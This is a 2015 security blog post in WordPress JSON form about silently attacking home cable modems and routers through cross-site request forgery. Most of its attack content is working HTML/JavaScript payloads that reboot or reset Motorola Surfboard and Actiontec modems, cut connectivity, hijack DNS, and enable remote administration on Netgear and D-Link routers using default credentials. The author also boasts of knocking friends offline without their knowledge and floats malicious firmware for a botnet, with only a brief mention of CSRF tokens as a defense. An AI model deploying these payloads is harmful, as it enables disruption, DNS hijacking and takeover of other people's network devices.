{"id":951,"date":"2015-01-17T08:24:32","date_gmt":"2015-01-17T08:24:32","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=951"},"modified":"2015-01-17T08:24:32","modified_gmt":"2015-01-17T08:24:32","slug":"owning_modems_and_routers_silently","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2015\/01\/owning_modems_and_routers_silently\/","title":{"rendered":"Owning Modems And Routers Silently"},"content":{"rendered":"

\nModems
\n<\/h3>\n

Do you have cable internet? Own a surfboard modem? Since most of my buddies in AZ do, I sent them to this page<\/a> and to my amusement, they got knocked off the net for a few minutes. How? Javascript. Specifically a CSRF in the Motorolla Surfboard. <\/p>\n

The Surfboard cable modem offers little in functionality besides rebooting unless of course I wanted to be malicious and remove all settings on the cable modem and essentially turn it into a door stop until the thing can be activated again by the ISP.
\n\"cm_fun0\"<\/a>
\nBut that would be a real dick move. <\/p>\n

Why does this attack work? First off, its unauthenticated so anyone can do this provided they’re on the local network. XSS comes in handy for when you want the victim to do something \/ visit somewhere. Since the victim is the one doing the running the script and not me, they’re already on the local network. <\/p>\n

How does the code work? We just post the data using some html and javascript:<\/p>\n

<\/p>\n

\n
<html><\/span>\r\nAYY LMAO Surfboard\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>\r\nvar<\/span> x;\r\nfor<\/span>(x=0<\/span>;x<255<\/span>;x++)\r\n{\r\ndocument.write("<iframe src='http:\/\/192.168."<\/span> + x + ".1\/reset.htm' width='3' height='5'><\/iframe>"<\/span>);\r\n}\r\n<\/script><\/span>\r\n<\/html><\/span>\r\n<\/pre>\n<\/div>\n
What about CenturyLink? I got your back here for their modern actiontek’s.<\/p>\n
<\/p>\n
\n
<html><\/span>\r\nActiontec from Centurylink\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>\r\nvar<\/span> x;\r\nfor<\/span>(x=0<\/span>;x<255<\/span>;x++)\r\n{\r\ndocument.write("<iframe src='http:\/\/192.168."<\/span> + x + ".1\/rebootinfo.html' width='3' height='5'><\/iframe>"<\/span>);\r\n}\r\n<\/script><\/span>\r\n<\/html><\/span>\r\n<\/pre>\n<\/div>\n
Am I done with modems? NO! There’s 1 more gem to go over!<\/p>\n
I was rummaging through my old stuff and found an old DSL modem. Yet another actiontek from Qwest internet (now known as CentruryLink). <\/p>\n
Just booting the thing up and browsing to the setup page I found this:<\/p>\n
\"actiontek_gt701-wg_2\"<\/a><\/p>\n
File download vulnerability. I used it to read the ELF bin inside. <\/p>\n
\"actiontek_gt701-wg_1\"<\/a>
\nA little peek in IDA told 2 things – Linux and MIPS. <\/p>\n
\"actiontek_gt701-wg_23\"<\/a><\/p>\n
Using the strings I was able to google a little more info on the thing. I came across
\ncm_cli<\/a> from RouterTech.org. Thanks to the docs, I was able to see the commands supported by this binary that are processed by the app which I can leverage using javascript \/ html.<\/p>\n
<\/p>\n
\n
<!-- reboot --><\/span>\r\n<body<\/span> onload=<\/span>"setTimeout(function(){document.forms[0].submit();},5000);"<\/span>><\/span>\r\n<form<\/span> name=<\/span>"form1"<\/span> method=<\/span>"post"<\/span> action=<\/span>"http:\/\/192.168.2.1\/cgi-bin\/webcm"<\/span>><\/span>\t\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"login:command\/password"<\/span> value=<\/span>"admin"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"logic:command\/reboot"<\/span> value=<\/span>"1"<\/span>><\/span>\r\n<\/form><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/body><\/span>\r\n<!-- disconnect from net --><\/span>\r\n<body<\/span> onload=<\/span>"setTimeout(function(){document.forms[0].submit();},5000);"<\/span>><\/span>\r\n<form<\/span> name=<\/span>"form1"<\/span> method=<\/span>"post"<\/span> action=<\/span>"http:\/\/192.168.2.1\/cgi-bin\/webcm"<\/span>><\/span>\t\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"login:command\/password"<\/span> value=<\/span>"admin"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"connection0:settings\/cmd_connect"<\/span> value=<\/span>"1"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"var:state"<\/span> value=<\/span>"0"<\/span>><\/span>\r\n<\/form><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/body><\/span>\r\n<!-- disable net --><\/span>\r\n<body<\/span> onload=<\/span>"setTimeout(function(){document.forms[0].submit();},5000);"<\/span>><\/span>\r\n<form<\/span> name=<\/span>"form1"<\/span> method=<\/span>"post"<\/span> action=<\/span>"http:\/\/192.168.2.1\/cgi-bin\/webcm"<\/span>><\/span>\t\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"login:command\/password"<\/span> value=<\/span>"admin"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"connection0:settings\/enabled"<\/span> value=<\/span>"0"<\/span>><\/span>\r\n<\/form><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/body><\/span>\r\n<\/pre>\n<\/div>\n
Just insert the code into an iframe or web page and wait. <\/p>\n
\nRouters
\n<\/h3>\n
What if I wanted to attack people’s routers instead of the modem? Most consumer routers are at the very least password protected, but for the most part, they use the out of the box defaults. Because who sets the password these days right? Not my dad!<\/p>\n
So how would you attack them?  My netgear modem for example uses HTTP Basic auth and out of the box, the default username \/ password combo is admin:admin. <\/p>\n
Now what about that reboot?
\n\"cm_fun04\"<\/a>
\nPeering at the source code of the page, we need a few variables to POST, otherwise this won’t work.
\n\"cm_fun03\"<\/a><\/p>\n
So 2 values need to be posted to the URI \/apply.cgi?\/reboot_waiting.htm.
\nname=”yes” value=”Yes” and name=”submit_flag” value=”reboot”<\/p>\n
So we do something like so:
\n<\/p>\n
\n
<form<\/span> action=<\/span>"http:\/\/admin:admin@192.168.1.1\/apply.cgi?\/reboot_waiting.htm"<\/span> method=<\/span>"POST"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"submit_flag"<\/span> value=<\/span>"reboot"<\/span> \/><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"yes"<\/span> value=<\/span>"Yes"<\/span> \/><\/span>\r\n<\/form><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/pre>\n<\/div>\n
Firefox will alert you when you’re about to login some place using this method with javascript, but not with an iframe. IE doesn’t.
\nThis should reboot a netgear router assuming they didn’t change their password defaults. <\/p>\n
Rebooting the router is only the tip of the iceberg. What if I coded this to change the user’s DNS servers to my own? Or better yet, enabled remote management? The real fun comes to mind however when we consider the possibility of passing a custom firmware image, like a hacked OpenWRT OS that calls home to daddy and allows for a botnet. All from visiting a compromised site, or better yet, some sort of reflective XSS somewhere. Why attempt to install malware on the victim’s PC when I can own everyone using the router instead?<\/p>\n
Code time! Let’s dive right in.<\/p>\n
Change DNS?<\/p>\n
Sure<\/p>\n
<\/p>\n
\n
<form<\/span> method=<\/span>"POST"<\/span> action=<\/span>"\/apply.cgi?\/BAS_update.htm"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"submit_flag"<\/span> value=<\/span>"ether"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"ether_dnsaddr1"<\/span> value=<\/span>"your_evil_dns_here"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"ether_dnsaddr2"<\/span> value=<\/span>"your_evil_dns_here"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"ether_dnsaddr3"<\/span> value=<\/span>"your_evil_dns_here"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"Apply"<\/span> value=<\/span>"Apply"<\/span>><\/span>\r\n<\/form><\/span>\t\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/pre>\n<\/div>\n
Disable the net? Sure.
\n<\/p>\n
\n
<form<\/span> method=<\/span>"POST"<\/span> action=<\/span>"\/apply.cgi?\/RST_conn_status.htm"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"submit_flag"<\/span> value=<\/span>"connect_status"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"endis_connect"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"connect"<\/span> value=<\/span>"Release"<\/span>><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/pre>\n<\/div>\n
Enable remote administration? Why not.
\n<\/p>\n
\n
<form<\/span> method=<\/span>"POST"<\/span> action=<\/span>"\/apply.cgi?\/FW_remote.htm"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"submit_flag"<\/span> value=<\/span>"remote"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"Apply"<\/span> value=<\/span>"Apply"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"http_rmport"<\/span> value=<\/span>"8080"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"remote_mg_enable"<\/span> value=<\/span>"1"<\/span>><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/pre>\n<\/div>\n
Not too shabby right?
\n\"1419914417132\"<\/a><\/p>\n
Again digging through through my stuff I found a Dlink WBR-1310 router.
\n\"WBR-1310_front20131014150156\"<\/a>
\nPerfect for ripping apart. <\/p>\n
When you first attempt to visit the admin page, there is no HTTP auth. No, its instead a form based authorization. This is because the router’s web server stores the session and doesn’t rely on things like cookies or basic auth for verification.<\/p>\n
\"dlink\"<\/a><\/p>\n
So how do we go about having some fun? In this example, we’ll modify DNS settings. Because if you control your victim’s DNS, you control your victim. First off we’ll need to authenticate:<\/p>\n
<\/p>\n
\n
<!-- place in iframe1, submit after .5 seconds --><\/span>\r\n<body<\/span> onload=<\/span>"setTimeout(function(){document.forms[0].submit();},500);"<\/span>><\/span>\r\n<form<\/span> action=<\/span>"http:\/\/192.168.1.1\/login.cgi"<\/span> method=<\/span>"post"<\/span>><\/span>\r\n <input<\/span> name=<\/span>"login_name"<\/span> value=<\/span>"admin"<\/span> type=<\/span>"hidden"<\/span>><\/td><\/span>\r\n <input<\/span> name=<\/span>"login_pass"<\/span> value=<\/span>""<\/span> type=<\/span>"hidden"<\/span>><\/span>\r\n <input<\/span> name=<\/span>"login"<\/span> value=<\/span>"Log ln"<\/span> type=<\/span>"submit"<\/span>><\/span>\r\n<\/form><\/span>\r\n<\/body><\/span>\r\n<\/pre>\n<\/div>\n
Then we submit to ‘h_wan_fix.cgi’ our settings after we’ve logged in:<\/p>\n
<\/p>\n
\n
<!-- place in iframe2 submit after 5 seconds to ensure login event takes place for router. --><\/span>\r\n<body<\/span> onload=<\/span>"setTimeout(function(){document.forms[0].submit();},5000);"<\/span>><\/span>\r\n<form<\/span> id=<\/span>"form1"<\/span> name=<\/span>"form1"<\/span> method=<\/span>"post"<\/span> action=<\/span>"http:\/\/192.168.1.1\/h_wan_fix.cgi"<\/span>><\/span>\t\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"static_dns1"<\/span> value=<\/span>"8.8.8.8"<\/span>><\/span>\r\n<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"static_dns2"<\/span> value=<\/span>"8.8.4.4"<\/span>><\/span>\r\n<\/form><\/span>\r\n<script <\/span>type=<\/span>"text\/javascript"<\/span>><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/body><\/span>\r\n<\/pre>\n<\/div>\n
Pretty slick eh?
\n\"mhhm\"<\/a><\/p>\n
In keeping with the other content, we can’t leave out the reboot code can we?<\/p>\n
\"dlink2\"<\/a><\/p>\n
Viewing the source of the page gives us everything we need:
\n\"dlink3\"<\/a><\/p>\n
Now we adapt to our needs:<\/p>\n
<\/p>\n
\n
<form<\/span> name=<\/span>"form6"<\/span> method=<\/span>"post"<\/span> action=<\/span>"http:\/\/192.168.1.1\/restart.cgi"<\/span>><\/span>\r\n Reboots the WBR-1310 \r\n\t<input<\/span> type=<\/span>"hidden"<\/span> name=<\/span>"restart"<\/span> value=<\/span>"Reboot"<\/span> \/><\/span>\r\n<\/form><\/span>\r\n<script><\/span>document.forms[0<\/span>].submit();<\/script><\/span>\r\n<\/pre>\n<\/div>\n
What about other routers and modems? Where does one go to get info on this? I found SetupRouter.com<\/a> to be extremely helpful for finding manuals, default passes, and settings. <\/p>\n
How could routers & modems defend against such an attack? CSRF tokens. In fact, I was trying this against a friend’s newer netgear and it had this protection enabled in the form of a “timestamp” variable included after each post request. Clever. What this means is my attack will only silently own older netgears \ud83d\ude41<\/p>\n
This post could go on and on, but I don’t have the funds to buy every router \/ modem out there and test. Part of the reason why I stuck to Cox \/ Qwest – they’re local to Phoenix. No FIOS here unfortunately.<\/p>\n
Happy Hacking!
\n\"1272727032069\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Modems Do you have cable internet? Own a surfboard modem? Since most of my buddies in AZ do, I sent them to this page and to my amusement, they got knocked off the net for a few minutes. How? Javascript. Specifically a CSRF in the Motorolla Surfboard. The Surfboard cable modem offers little in functionality […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,6],"tags":[101,99,98,100],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/951"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=951"}],"version-history":[{"count":18,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/951\/revisions"}],"predecessor-version":[{"id":1024,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/951\/revisions\/1024"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}